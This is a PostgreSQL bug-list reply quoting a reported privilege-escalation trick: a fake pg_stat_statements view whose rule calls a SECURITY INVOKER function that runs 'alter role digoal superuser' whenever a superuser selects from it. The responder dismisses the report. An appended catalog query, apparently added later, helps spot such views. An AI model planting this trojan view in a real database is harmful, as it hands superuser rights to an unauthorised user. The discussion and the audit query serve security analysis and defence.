Re: BUG #13651: trigger security invoker attack - Mailing list pgsql-bugs

From David G. Johnston
Subject Re: BUG #13651: trigger security invoker attack
Msg-id CAKFQuwZkmBiq9fAZHOjEfbOoazzm=NQwvpBvVGtgrgjT__4EhQ@mail.gmail.com
In response to Re: BUG #13651: trigger security invoker attack  (德哥 <digoal@126.com>)
Responses Re: BUG #13651: trigger security invoker attack  (德哥 <digoal@126.com>)
List pgsql-bugs
On Tuesday, September 29, 2015, 德哥 <digoal@126.com> wrote:

> A normal user gets super privilege, using a security invoker function.
> postgres=> create table pg_stat_statements (
>  userid oid              ,
>  dbid                oid      ,
>  queryid             bigint      ,
>  query               text           ,
>  calls               bigint      ,
>  total_time          double precision ,
>  rows                bigint           ,
>  shared_blks_hit     bigint   ,
>  shared_blks_read    bigint    ,
>  shared_blks_dirtied bigint     ,
>  shared_blks_written bigint      ,
>  local_blks_hit      bigint       ,
>  local_blks_read     bigint          ,
>  local_blks_dirtied  bigint        ,
>  local_blks_written  bigint         ,
>  temp_blks_read      bigint          ,
>  temp_blks_written   bigint           ,
>  blk_read_time       double precision ,
>  blk_write_time      double precision );
>
> postgres=> create or replace function f() returns pg_stat_statements as $$
>
> declare
> begin
>   alter role digoal superuser;
> end;
> $$ language plpgsql security invoker;
> CREATE FUNCTION
>
> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
> instead select * from f();
> CREATE RULE
>
> When a superuser selects from the view pg_stat_statements, the normal user
> digoal will be granted the superuser role.
>
> Yes, it's a normal operation, but somebody can use this trick.
>


Everything you just wrote was done as superuser so what's your point?

David J.
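
For the defender's side of the pattern quoted above, an added example that is not part of the original thread: a catalog query a superuser can run before selecting from unfamiliar views. It lists views whose "_RETURN" rule calls a SECURITY INVOKER function owned by a non-superuser role, and assumes only the standard system catalogs.

```sql
-- Added audit query (not from the thread).
-- A function called from a view runs with the privileges of whoever selects
-- from the view unless it is SECURITY DEFINER, so a view that calls a
-- function written by an unprivileged role deserves review before a
-- superuser queries it.
SELECT n.nspname            AS view_schema,
       c.relname            AS view_name,
       vo.rolname           AS view_owner,
       p.oid::regprocedure  AS called_function,
       fo.rolname           AS function_owner
FROM pg_rewrite r
JOIN pg_class c     ON c.oid = r.ev_class
                   AND c.relkind = 'v'               -- views only
JOIN pg_namespace n ON n.oid = c.relnamespace
JOIN pg_roles vo    ON vo.oid = c.relowner
JOIN pg_depend d    ON d.classid    = 'pg_rewrite'::regclass
                   AND d.objid      = r.oid          -- the view's rule ...
                   AND d.refclassid = 'pg_proc'::regclass
JOIN pg_proc p      ON p.oid = d.refobjid            -- ... depends on this function
JOIN pg_roles fo    ON fo.oid = p.proowner
WHERE r.rulename = '_RETURN'
  AND NOT p.prosecdef                                -- SECURITY INVOKER
  AND NOT fo.rolsuper                                -- function owned by a non-superuser
ORDER BY view_schema, view_name;
```

Run it in each database, since the catalogs it reads are per-database.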
